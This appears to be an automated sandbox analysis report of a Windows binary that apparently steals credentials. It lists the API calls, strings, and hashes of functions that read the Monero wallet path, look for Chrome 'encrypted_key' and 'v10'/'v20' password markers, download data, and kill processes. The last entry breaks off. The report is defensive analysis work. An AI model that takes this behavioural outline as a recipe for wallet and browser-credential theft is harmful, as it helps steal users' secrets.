                                • HeapFree.KERNEL32(00000000), ref: 00E478F3
                                • RegEnumValueA.ADVAPI32(80000001,00000000,?,000000FF,00000000,00000003,?,?,80000001), ref: 00E47A35
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$EnumFreeProcessValue$AllocateByteCharCryptDataLocalMultiOpenUnprotectWide
                                • String ID: Password
                                • API String ID: 356768136-3434357891
                                • Opcode ID: 61735710654f2f28a80ae7baeca9cf4272a1312a2ae044afd2e0e2692dcd2967
                                • Instruction ID: 815522e0c4eb1d667eed25f3291f64233d77a5ffcf794ec75cc4576bd5ba0e01
                                • Opcode Fuzzy Hash: 61735710654f2f28a80ae7baeca9cf4272a1312a2ae044afd2e0e2692dcd2967
                                • Instruction Fuzzy Hash: 47713EB1D0021DABDB10DF95DC84AEEB7B9EF48300F14556AE649F7200EB356E85CBA0
                                Function 00E41120 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 37registrymemoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E41135
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00E4113C
                                • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00E41159
                                • RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00E41173
                                • RegCloseKey.ADVAPI32(?), ref: 00E4117D
                                Strings
                                • wallet_path, xrefs: 00E4116D
                                • SOFTWARE\monero-project\monero-core, xrefs: 00E4114F
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                                • API String ID: 3225020163-4244082812
                                • Opcode ID: bab81678a5f77e7794fdd69c88d2bb5e25bae95873d9756f15bda11024747b87
                                • Instruction ID: 7a7cd5bbe6593d58cffc0e2a27f68b32ee7c0c58caba23334d8f0c4a745f6b6e
                                • Opcode Fuzzy Hash: bab81678a5f77e7794fdd69c88d2bb5e25bae95873d9756f15bda11024747b87
                                • Instruction Fuzzy Hash: 9FF01D75A40308BFD7209BA4AC4EFAA7B6CEB04729F104195FF49F2284E6B55A4487E0
                                Function 00E49DE0 Relevance: 12.2, APIs: 5, Strings: 3, Instructions: 183memorystringCOMMON
                                Download Yara Rule
                                APIs
                                • memcmp.MSVCRT(?,v20,00000003), ref: 00E49E04
                                • memcmp.MSVCRT(?,v10,00000003), ref: 00E49E42
                                • LocalAlloc.KERNEL32(00000040), ref: 00E49EA7
                                  • Part of subcall function 00E671E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 00E671FE
                                • lstrcpy.KERNEL32(00000000,00E74C48), ref: 00E49FB2
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpymemcmp$AllocLocal
                                • String ID: @$v10$v20
                                • API String ID: 102826412-278772428
                                • Opcode ID: 4afdcfc0f8d6d9d593bc0476a8578f0f2926c66d72e8a0439aa8d2575e9f498e
                                • Instruction ID: 719136cab15df8a6076c5da4b3f91eb851895327f615314601b127f1217d6c83
                                • Opcode Fuzzy Hash: 4afdcfc0f8d6d9d593bc0476a8578f0f2926c66d72e8a0439aa8d2575e9f498e
                                • Instruction Fuzzy Hash: 9251B071A102099BDB21EFA8EC45B9F77E4AF40358F156028FE49FB242DB70ED458B90
                                Function 00E45640 Relevance: 12.1, APIs: 8, Instructions: 112networkmemoryfileCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00E4565A
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00E45661
                                • InternetOpenA.WININET(00E6CFEC,00000000,00000000,00000000,00000000), ref: 00E45677
                                • InternetOpenUrlA.WININET(00000000,00000001,00000000,00000000,04000100,00000000), ref: 00E45692
                                • InternetReadFile.WININET(?,?,00000400,00000001), ref: 00E456BC
                                • memcpy.MSVCRT(00000000,?,00000001), ref: 00E456E1
                                • InternetCloseHandle.WININET(?), ref: 00E456FA
                                • InternetCloseHandle.WININET(00000000), ref: 00E45701
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                                • String ID:
                                • API String ID: 1008454911-0
                                • Opcode ID: 3d839e36ebbb46f3c0259ad4d3371482c84e921f077fbc6e30113562f12e98ca
                                • Instruction ID: 2185fcef4a2a97b4e116fa6fb89cc32aada4b6a5ac9a16865b8057ca1b6e9a8f
                                • Opcode Fuzzy Hash: 3d839e36ebbb46f3c0259ad4d3371482c84e921f077fbc6e30113562f12e98ca
                                • Instruction Fuzzy Hash: 08418371E00204EFDB24CF55E988FAAB7B5FF48318F1480AAE608AB295D3759941CF90
                                Function 00E64740 Relevance: 12.1, APIs: 8, Instructions: 52processCOMMON
                                Download Yara Rule
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00E64759
                                • Process32First.KERNEL32(00000000,00000128), ref: 00E64769
                                • Process32Next.KERNEL32(00000000,00000128), ref: 00E6477B
                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00E6479C
                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 00E647AB
                                • CloseHandle.KERNEL32(00000000), ref: 00E647B2
                                • Process32Next.KERNEL32(00000000,00000128), ref: 00E647C0
                                • CloseHandle.KERNEL32(00000000), ref: 00E647CB
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                • String ID:
                                • API String ID: 3836391474-0
                                • Opcode ID: 978be5a73479c4254301f9155a43176870c5a9e5246ab8720444eb498fb2931d
                                • Instruction ID: 2765ea0770620468cf8362c8776051a2a9c60ce581efd883af475418cef7ff1b
                                • Opcode Fuzzy Hash: 978be5a73479c4254301f9155a43176870c5a9e5246ab8720444eb498fb2931d
                                • Instruction Fuzzy Hash: 4E01B971A41214AFE7315F60AC8DFEA777CEB047A5F001196FA49F10C5EB799D808BA0
                                Function 00E583E0 Relevance: 10.6, APIs: 7, Instructions: 147stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(00000000), ref: 00E58435
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E5846C
                                • lstrlen.KERNEL32(00000000), ref: 00E584B2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E584E9
                                • lstrlen.KERNEL32(00000000), ref: 00E584FF
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E5852E
                                • StrCmpCA.SHLWAPI(00000000,00E74C3C), ref: 00E5853E
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: c76cfc5528ac2d4be74e5f131945fea313d71c7cb545a5994cffda2257e2b124
                                • Instruction ID: c1af7d62d390f9635cc5eface100c4b8331c48e20f452c806d65399d216b06bc
                                • Opcode Fuzzy Hash: c76cfc5528ac2d4be74e5f131945fea313d71c7cb545a5994cffda2257e2b124
                                • Instruction Fuzzy Hash: 0151C2719002029FCB24DF29DA84A9BB7F5EF48304F14A81DEC86FB245EB31E945CB50
                                Function 00E62910 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49registrymemoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00E62925
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00E6292C
                                • RegOpenKeyExA.ADVAPI32(80000002,016BB8A0,00000000,00020119,00E628A9), ref: 00E6294B
                                • RegQueryValueExA.ADVAPI32(00E628A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00E62965
                                • RegCloseKey.ADVAPI32(00E628A9), ref: 00E6296F
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: CurrentBuildNumber
                                • API String ID: 3225020163-1022791448
                                • Opcode ID: b4650d5cf3e535f86037d890171af6ed5a6a266d44b7be1177847971f3de5aaa
                                • Instruction ID: 451bcc377ca0d8088f7d62434434544947962d7b5d86e9097ab2edde33bf7f05
                                • Opcode Fuzzy Hash: b4650d5cf3e535f86037d890171af6ed5a6a266d44b7be1177847971f3de5aaa
                                • Instruction Fuzzy Hash: 5B01B175A40318AFD320CBA0A859EBB7BBCEB88769F104059FF85B7244E676590487A0
                                Function 00E62880 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47registrymemoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00E62895
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00E6289C
                                  • Part of subcall function 00E62910: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00E62925
                                  • Part of subcall function 00E62910: RtlAllocateHeap.NTDLL(00000000), ref: 00E6292C
                                  • Part of subcall function 00E62910: RegOpenKeyExA.ADVAPI32(80000002,016BB8A0,00000000,00020119,00E628A9), ref: 00E6294B
                                  • Part of subcall function 00E62910: RegQueryValueExA.ADVAPI32(00E628A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00E62965
                                  • Part of subcall function 00E62910: RegCloseKey.ADVAPI32(00E628A9), ref: 00E6296F
                                • RegOpenKeyExA.ADVAPI32(80000002,016BB8A0,00000000,00020119,00E59500), ref: 00E628D1
                                • RegQueryValueExA.ADVAPI32(00E59500,016CEBA0,00000000,00000000,00000000,000000FF), ref: 00E628EC
                                • RegCloseKey.ADVAPI32(00E59500), ref: 00E628F6
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: Windows 11
                                • API String ID: 3225020163-2517555085
                                • Opcode ID: d662351810a2d13f354abb8a901febafde582f1b1098e47fbc56f100b7e7bea8
                                • Instruction ID: 14f2f32f18f4519f8dc90bf33a79c543602c6f6d4240d2a23cb620cd4fce28ed
                                • Opcode Fuzzy Hash: d662351810a2d13f354abb8a901febafde582f1b1098e47fbc56f100b7e7bea8
                                • Instruction Fuzzy Hash: 7501A271A40208BFD7249BA4EC4DEAA776DEB44355F004159FF48F7244D676594487E0
                                Function 00E471F0 Relevance: 9.1, APIs: 6, Instructions: 142memorylibraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryA.KERNEL32(?), ref: 00E4723E
                                • GetProcessHeap.KERNEL32(00000008,00000010), ref: 00E47279
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00E47280
                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00E472C3
                                • HeapFree.KERNEL32(00000000), ref: 00E472CA
                                • GetProcAddress.KERNEL32(00000000,?), ref: 00E47329
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$Process$AddressAllocateFreeLibraryLoadProc
                                • String ID:
                                • API String ID: 174687898-0
                                • Opcode ID: 28aa707d3dc56004fb68513a66cdc1c5582d61cc92365435cf52f5666de828cd
                                • Instruction ID: ace106a1bb270c331c3bf671520eca7acf3990237211d045370d0adbcfb7e6e5
                                • Opcode Fuzzy Hash: 28aa707d3dc56004fb68513a66cdc1c5582d61cc92365435cf52f5666de828cd
                                • Instruction Fuzzy Hash: A9415D71B056069BDB20CF69E884BAAB3E8FB84319F144569ED8DE7310E775E9009B90
                                Function 00E49C70 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 124memorystringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000), ref: 00E49CA8
                                • LocalAlloc.KERNEL32(00000040,?), ref: 00E49CDA
                                • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00E49D03
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
